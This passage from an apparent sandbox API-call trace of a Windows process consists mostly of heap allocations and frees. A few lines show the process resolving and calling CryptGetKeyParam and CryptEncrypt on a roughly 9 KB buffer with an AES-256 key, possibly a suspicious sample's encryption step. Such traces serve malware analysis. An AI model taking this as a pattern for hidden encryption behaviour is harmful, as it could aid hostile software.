Flags=0x0, Size=0x20) returned 0x43d01c0 [0078.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0078.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0078.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0078.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0078.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0078.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0078.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0078.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0078.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0078.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0078.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0078.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0078.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0078.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0078.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0078.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0078.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0078.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0078.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0078.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0078.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0078.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0078.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0078.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0078.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0078.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0078.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0078.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0078.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0078.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0078.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0078.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0078.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0078.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0078.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0078.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0078.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0078.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0078.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0078.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0078.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0078.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0078.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797088, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0078.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0078.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0078.646] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0078.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0078.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0078.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0078.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0078.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0078.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0078.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0078.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0078.646] CryptGetKeyParam (in: hKey=0x41ac780, dwParam=0x7, pbData=0x43e2890, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2890*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0078.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0078.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0078.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0078.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0078.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0078.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0078.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0078.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0078.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0078.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0078.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0078.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0078.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0078.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0078.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0078.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0078.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0078.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0078.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0078.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0078.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0078.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0078.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0078.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0078.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0078.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0078.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0078.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0078.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0078.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0078.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0078.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0078.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0078.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0078.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0078.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0078.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0078.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0078.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0078.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0078.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0078.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2668 | out: hHeap=0x1780000) returned 1 [0078.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0078.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0078.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0078.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0078.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0078.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0078.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0078.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0078.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0078.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0078.648] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0078.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0078.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0078.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0078.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0078.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0078.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0078.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0078.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0078.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0078.649] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0078.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0078.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0078.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0078.649] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0078.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0078.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0078.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0078.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0078.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0078.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0078.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0078.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0078.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0078.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0078.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0078.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0078.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0078.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0078.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0078.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0078.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0078.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0078.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0078.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0078.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0078.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0078.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0078.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0078.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0078.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0078.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0078.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0078.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0078.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0078.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0078.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0078.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0078.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0078.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0078.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0078.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0078.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0078.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0078.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0078.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0078.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0078.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0078.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0078.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0078.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0078.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0078.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0078.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0078.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0078.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0078.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0078.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0078.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0078.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0078.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0078.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0078.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0078.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0078.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0078.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0078.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0078.651] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0078.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0078.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0078.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0078.651] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0078.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0078.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0078.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0078.651] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0078.651] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0078.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0078.651] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0078.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0078.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0078.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0078.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0078.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0078.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0078.652] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0078.652] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.652] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0078.652] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.652] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0078.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caf28, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0078.652] CryptEncrypt (in: hKey=0x41ac780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x23b6, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x23c0) returned 1 [0078.653] CharLowerBuffW (in: lpsz="byte[9153]", cchLength=0xa | out: lpsz="byte[9153]") returned 0xa [0078.653] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.653] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0078.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb180, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 